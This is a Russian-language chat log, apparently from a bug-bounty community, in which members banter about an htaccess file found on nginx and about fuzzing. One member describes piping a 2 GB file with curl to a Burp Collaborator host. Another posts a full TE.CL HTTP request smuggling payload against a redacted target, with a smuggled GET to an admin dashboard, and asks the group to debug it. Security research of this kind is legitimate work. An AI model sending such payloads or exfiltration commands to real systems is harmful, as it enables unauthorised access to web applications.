᠌
Ясно, вообщем так до них не достучаться (
Size: a a a
2021 January 07
1
Возможно потому что пхп обрабатываются отдельным правилом в конфиге
Ну или так... 🤷♂
B
Круто, когда в nginx есть htaccess
GD
Круто, когда в nginx есть htaccess
Я о том же задумался)
<ᅠ
Круто, когда в nginx есть htaccess
кст твой вордлист для фузза
<ᅠ
это просто чудо
VS
это просто чудо
главное чтоб это чудо не происходило на госулугах и прочих порталах ру сегмента )
SB
Круто, когда в nginx есть htaccess
🥲
1
Круто, когда в nginx есть htaccess
😆 бывает. Жаль
👾0
как так вышло что я колаборатор бурпа сломал у себя отправивши cat <2гб файл>.txt | curl колаборатор?
👾0
и теперь почему то с того хоста не принимает ничего
᠌
Выглядит как уязвимость достойная репорта
s
А откуда он знает, что его просто не заблочили?
᠌
᠌
А откуда он знает, что его просто не заблочили?
Можно на private collaborator server потренироваться
᠌
James kettle: <не любит компании, которые просто так запрещают все виды DoS из за своего cache poisoning ресёча>
Также James Kettle:
Также James Kettle:
👾0
А откуда он знает, что его просто не заблочили?
Потому что у окуня все ок
2021 January 08
GD
Чувствую себя немного дебилом. Может кто посмотреть пейлоад TE.CL
GD
POST /?dd=qwrkxkktqkww HTTP/1.1
Transfer-Encoding : chunked
Host: redacted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 4
Cookie: xxxxx
7b
GET /applications/dashboard HTTP/1.1
Host: redacted
Content-Type: application/x-www-form-urlencoded
content-length:60
x=
0
GD
Что не так тут...? content-length сделал маленьким чтобы обходить автозамену турбоинтрудером